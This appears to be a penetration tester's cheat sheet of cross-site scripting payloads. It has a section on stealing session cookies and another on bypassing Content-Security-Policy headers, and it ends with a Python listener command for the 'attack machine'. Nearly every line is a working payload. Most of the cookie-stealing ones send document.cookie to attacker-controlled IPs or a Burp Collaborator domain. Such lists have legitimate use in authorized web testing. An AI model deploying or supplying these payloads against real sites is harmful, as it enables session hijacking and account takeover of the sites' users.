==============================================================================
[+] Steal Coockie XXS
==============================================================================
# Payload 1
<img src=x onerror=this.src='http://10.10.10.10/?c='+document.cookie>

# Payload 2
<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>

# Payload 3
<script>var i=new Image;i.src="http://10.10.10.10/?"+document.cookie;</script

# Payload 4
<img src=x onerror=this.src='http://10.10.10.10/?'+document.cookie;>

# Payload 5
<img src=x onerror="this.src='http://192.168.0.18:8888/?'+document.cookie; this.removeAttribute('onerror');">

“--></sCrIpT><sCrIpT>document.location=“http://vvuim9b9t49t2kpvv7f4gq27kyqoed.burpcollaborator.net/?c=“+document.cookie;</sCrIpT>

<script>img = new Image(); img.src = "http://192.168.1.44/a.php?"+document.cookie;</script>

"><a%20href="https://xxxxxxxxxxxxxxx.burpcollaborator.net"><H1>Click%20here!</H1></a><input

==============================================================================
[+] Bypass Content-security-policy header XSS
==============================================================================
# https://medium.com/@bhavesh_thakur/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
# 1. 
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

# 2.
<object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

# 3.
<script src="/user_upload/mypic.png.js"></script>

# 4.
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>


# Attack Machine
sudo python -m SimpleHTTPServer 80
